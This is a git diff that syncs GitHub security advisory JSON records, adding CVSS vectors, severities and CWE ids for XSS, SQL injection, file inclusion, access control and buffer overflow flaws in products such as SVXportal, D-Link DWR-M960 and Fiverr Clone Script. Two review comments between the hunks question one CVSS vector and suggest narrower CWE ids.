+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:38Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json b/advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json
new file mode 100644
index 0000000000000..96648729c36d3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7vm8-ccqm-97q2/GHSA-7vm8-ccqm-97q2.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7vm8-ccqm-97q2",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2025-62326"
+ ],
+ "details": "HCL Digital Experience is susceptible to stored cross-site scripting (XSS) in the administrative user interface which would require elevated privileges to exploit.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62326"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128824"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T20:25:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json b/advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json
new file mode 100644
index 0000000000000..a3810ba44b9f5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-86qm-25mg-cp7q/GHSA-86qm-25mg-cp7q.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-86qm-25mg-cp7q",
+ "modified": "2026-02-20T21:31:23Z",
+ "published": "2026-02-20T21:31:23Z",
+ "aliases": [
+ "CVE-2026-2852"
+ ],
+ "details": "A vulnerability was identified in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This issue affects the function addSales/updateSales/deleteSales of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\bus\\controller\\SalesController.java of the component Sales Endpoint. The manipulation leads to improper access controls. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2852"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/63"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/63#issue-3846671301"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347088"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347088"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754431"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T19:23:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json
index 2f1ee53565a26..91126eaff043e 100644
--- a/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json
+++ b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-87jc-9r3r-58w8",
- "modified": "2026-02-20T18:31:40Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-27505"
 ],
 "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user registration workflow (index.php submitting to admin/user_action.php). User-supplied fields such as Firstname, lastname, and email are stored in the backend database without adequate output encoding and are later rendered in the administrator interface (admin/users.php), allowing an unauthenticated remote attacker to inject arbitrary JavaScript that executes in an administrator's browser upon viewing the affected page.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json
index 9fcc4765a442d..7b6a151110326 100644
--- a/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json
+++ b/advisories/unreviewed/2026/02/GHSA-c49j-5m2h-224g/GHSA-c49j-5m2h-224g.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c49j-5m2h-224g",
- "modified": "2026-02-20T18:31:39Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22380"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes UnlimHost unlimhost allows PHP Local File Inclusion.This issue affects UnlimHost: from n/a through <= 1.2.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:37Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json b/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json
index feeb9e8253eff..559b76a49526c 100644
--- a/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json
+++ b/advisories/unreviewed/2026/02/GHSA-cgwr-5223-r4pg/GHSA-cgwr-5223-r4pg.json
@@ -37,7 +37,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-285"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json
index 882b4cca10a17..f58705af69137 100644
--- a/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json
+++ b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json
@@ -50,7 +50,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-416"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json b/advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json
new file mode 100644
index 0000000000000..81918668a2bc3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fgjg-x2hx-m8rf/GHSA-fgjg-x2hx-m8rf.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fgjg-x2hx-m8rf",
+ "modified": "2026-02-20T21:31:23Z",
+ "published": "2026-02-20T21:31:23Z",
+ "aliases": [
+ "CVE-2019-25444"
+ ],
+ "details": "Fiverr Clone Script 1.2.2 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the page parameter. Attackers can supply malicious SQL syntax in the page parameter to extract sensitive database information or modify database contents.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25444"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/46637"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/fiverr-clone-script-sql-injection-via-page-parameter"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T19:23:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json b/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json
index 4f71cc4d5a745..e4672f27c8a70 100644
--- a/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json
+++ b/advisories/unreviewed/2026/02/GHSA-fr87-mwgv-wmcc/GHSA-fr87-mwgv-wmcc.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fr87-mwgv-wmcc",
- "modified": "2026-02-19T18:31:54Z",
+ "modified": "2026-02-20T21:31:21Z",
 "published": "2026-02-19T18:31:54Z",
 "aliases": [
 "CVE-2025-15563"
 ],
 "details": "Any unauthenticated user can reset the WorkTime on-prem database configuration by sending a specific HTTP request to the WorkTime server. No authorization check is applied here.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T11:15:56Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json
index 71ec755e47357..0545d3cfb56ac 100644
--- a/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json
+++ b/advisories/unreviewed/2026/02/GHSA-gfrr-w669-mfpw/GHSA-gfrr-w669-mfpw.json
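Review bot: The `CVSS_V3` vector added to GHSA-fr87-mwgv-wmcc (CVE-2025-15563) ends in `C:L/I:N/A:N`, yet the `details` text of the same record says any unauthenticated user can reset the on-prem database configuration, which is a change to server state rather than a read. An integrity and availability impact of none does not match that description, and the second hunk's `"severity": "MODERATE"` presumably follows from the same vector. I would confirm the vector against the upstream CVE record before relying on the rating; if the description is right, the `I`/`A` metrics and the derived `severity` both need revisiting, and defenders should prioritise this one by the description in the meantime.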
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gfrr-w669-mfpw",
- "modified": "2026-02-20T18:31:40Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-27504"
 ],
 "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in radiomobile_front.php via the stationid query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value into a hidden input value field, allowing attacker-supplied script injection and execution in the administrator's browser. This can be used to compromise admin sessions or perform unauthorized actions via the administrator's authenticated context.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json
index 9383fb52f68b9..235f9f538902a 100644
--- a/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json
+++ b/advisories/unreviewed/2026/02/GHSA-gmmc-3vpq-7m4c/GHSA-gmmc-3vpq-7m4c.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gmmc-3vpq-7m4c",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22366"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Jude jude allows PHP Local File Inclusion.This issue affects Jude: from n/a through <= 1.3.0.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:35Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json
index 43499f385ad23..423522c16a937 100644
--- a/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json
+++ b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-h8h3-mqvc-hwrf",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22368"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Redy redy allows PHP Local File Inclusion.This issue affects Redy: from n/a through <= 1.0.2.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:35Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json b/advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json
new file mode 100644
index 0000000000000..e7e6782cee933
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h9gf-cpg2-x9mv/GHSA-h9gf-cpg2-x9mv.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h9gf-cpg2-x9mv",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2026-2856"
+ ],
+ "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. Affected by this vulnerability is the function sub_424AFC of the file /boafrm/formFilter of the component Filter Configuration Endpoint. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2856"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/13"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347095"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347095"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754474"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T21:19:30Z"
+ }
+}
\ No newline at end of file
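Review bot: `cwe_ids` in GHSA-h9gf-cpg2-x9mv lists only the broad class `"CWE-119"`, although `details` states a stack-based buffer overflow reached through the `submit-url` argument. The GHSA-mjjq-x58m-rfxp hunk in this same sync refines a `"CWE-119"` entry to `"CWE-119", "CWE-787"`, so the new D-Link records end up less specific than an entry the patch itself touches. I would add the narrower id here as well, for example `"CWE-119",` followed by `"CWE-121"`, provided the upstream CNA data supports it. The same applies to GHSA-r62q-p7vv-vh53 later in the patch.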
diff --git a/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json
index a2aaea7acfba6..260674d350197 100644
--- a/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json
+++ b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hc23-qvrh-v59g",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22370"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Marveland marveland allows PHP Local File Inclusion.This issue affects Marveland: from n/a through <= 1.3.0.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:36Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json
index 64d787ad2ebd5..4a99c3e4245f3 100644
--- a/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json
+++ b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-m23x-mm6q-4qg4",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22364"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes SevenTrees seventrees allows PHP Local File Inclusion.This issue affects SevenTrees: from n/a through <=1.0.2.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:35Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json
index 1616b0064619c..1f94774cfeba0 100644
--- a/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json
+++ b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mj9g-3f37-7qv2",
- "modified": "2026-02-20T18:31:39Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-24950"
 ],
 "details": "Authorization Bypass Through User-Controlled Key vulnerability in themeplugs Authorsy authorsy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Authorsy: from n/a through <= 1.0.6.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-639"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:39Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json
index ae8435903a1a7..4706d575a663d 100644
--- a/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json
+++ b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json
@@ -50,7 +50,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-787"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json b/advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json
new file mode 100644
index 0000000000000..1f0f3e2e383e6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mv55-hjp6-qw4c/GHSA-mv55-hjp6-qw4c.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mv55-hjp6-qw4c",
+ "modified": "2026-02-20T21:31:23Z",
+ "published": "2026-02-20T21:31:23Z",
+ "aliases": [
+ "CVE-2019-25445"
+ ],
+ "details": "Fiverr Clone Script 1.2.2 contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the keyword parameter. Attackers can craft URLs with script tags in the keyword parameter of search-results.php to execute arbitrary JavaScript in users' browsers.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25445"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.exploit-db.com/exploits/46637"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/fiverr-clone-script-cross-site-scripting-via-search-resultsphp"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T19:23:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json
index 0b31d56c005f6..adaea3dbdea83 100644
--- a/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json
+++ b/advisories/unreviewed/2026/02/GHSA-pg4q-7rh5-52c9/GHSA-pg4q-7rh5-52c9.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pg4q-7rh5-52c9",
- "modified": "2026-02-20T18:31:40Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-27502"
 ],
 "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in log.php via the search query parameter. The application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing an unauthenticated remote attacker to inject and execute arbitrary JavaScript in a victim's browser if the victim visits a crafted URL. This can be used to steal session data, perform actions as the victim, or modify displayed content.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
